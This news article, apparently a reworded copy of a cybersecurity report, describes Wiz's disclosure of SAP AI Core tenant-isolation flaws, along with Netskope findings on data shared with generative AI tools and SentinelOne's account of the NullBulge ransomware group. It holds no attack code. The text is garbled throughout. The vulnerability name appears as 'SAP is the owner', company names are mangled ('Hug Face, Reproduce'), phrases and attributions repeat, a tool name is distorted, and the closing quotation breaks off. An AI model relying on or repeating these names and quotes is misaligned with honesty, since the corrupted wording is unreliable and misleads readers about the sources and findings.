Cybersecurity researchers have discovered security flaws in SAP AI Core cloud-based platform for building and deploying predictive artificial intelligence (AI) workflows that could be leveraged to obtain access tokens and customer data.
The five vulnerabilities have been collectively dubbed SAP is the owner by cloud security company Wiz.
“The vulnerabilities we discovered could have allowed attackers to access customer data and contaminate internal artifacts, spreading to associated services and other customer environments,” said security researcher Hillai Ben-Sasson. said in a report shared with The Hacker News.
Following responsible disclosure on January 25, 2024, the weaknesses were corrected by SAP as of May 15, 2024.
In a nutshell, the flaws allow unauthorized access to private artifacts and customer credentials in cloud environments like Amazon Web Services (AWS), Microsoft Azure, and SAP HANA Cloud.
They could also be used to modify Docker images on SAP’s internal container registry, SAP’s Docker images on Google’s container registry, and artifacts hosted on SAP’s internal Artifactory server, leading to a supply chain attack on SAP AI Core services.
Additionally, the access could be weaponized to gain cluster administrator privileges on the SAP AI Core Kubernetes cluster by leveraging the fact that the Helm package manager server was exposed to both read and write operations.
“Using this level of access, an attacker could directly access other customers’ Pods and steal sensitive data, such as models, datasets, and code,” Ben-Sasson explained. “This access also allows attackers to interfere with customers’ Pods, corrupt AI data, and manipulate model inferences.”
Wiz said the issues arise because the platform allows malicious AI models and training procedures to be run without proper isolation and sandboxing mechanisms.
“Recent security breaches at AI service providers like Hug Face, Reproduce“The SAP AI Core and SAP AI Core platforms highlight significant vulnerabilities in their tenant isolation and segmentation implementations,” Ben-Sasson told The Hacker News. “These platforms allow users to run untrusted AI models and training procedures in shared environments, increasing the risk that malicious users can access other users’ data.”
“Unlike experienced cloud providers who have extensive experience with tenant isolation practices and use robust isolation techniques like virtual machines, these new services often lack this knowledge and rely on containerization, which offers weaker security. This underscores the need to raise awareness of the importance of tenant isolation and incentivize the AI services industry to harden its environments.”
Therefore, a malicious actor could build a classic AI application on SAP AI Core, bypass network restrictions, and probe the Kubernetes Pod’s internal network to obtain AWS tokens and access client code and training datasets by exploiting misconfigurations in AWS Elastic File System (EFS) shares.
“People need to be aware that AI models are essentially code. When you run AI models on your own infrastructure, you could be exposed to potential supply chain attacks,” Ben-Sasson said.
“Only run trusted models from trusted sources and properly separate external models from sensitive infrastructure. When engaging AI service providers, it is important to review their tenant isolation architecture and ensure they are implementing best practices.”
The findings come as Netskope revealed that the growing use of generative AI by enterprises has prompted organizations to use blocking controls, data loss prevention (DLP) tools, real-time coaching and other mechanisms to mitigate risks.
“Regulated data (data that organizations have a legal obligation to protect) makes up more than a third of sensitive data shared with generative AI (genAI) applications – posing a potential risk to businesses of costly data breaches,” the company said. said.
They also track the emergence of a new cybercriminal group called NullBulge that has targeted AI and gaming-focused entities since April 2024 with the aim of stealing sensitive data and selling compromised OpenAI API keys in underground forums while pretending to be a team of hacktivists “protecting the world’s artists” from AI.
“NullBulge targets the software supply chain by weaponizing code in publicly accessible repositories on GitHub and Hugging Face, leading victims to import malicious libraries or via mod packs used by gaming and modding software,” said Jim Walter, security researcher at SentinelOne. said.
“The group uses tools like AsyncRAT And Worm X before delivering the LockBit payloads built using the leak LockBit Black Groups like NullBulge represent the ongoing threat of low-barrier-to-entry ransomware, combined with the lingering effect of information-stealing infections.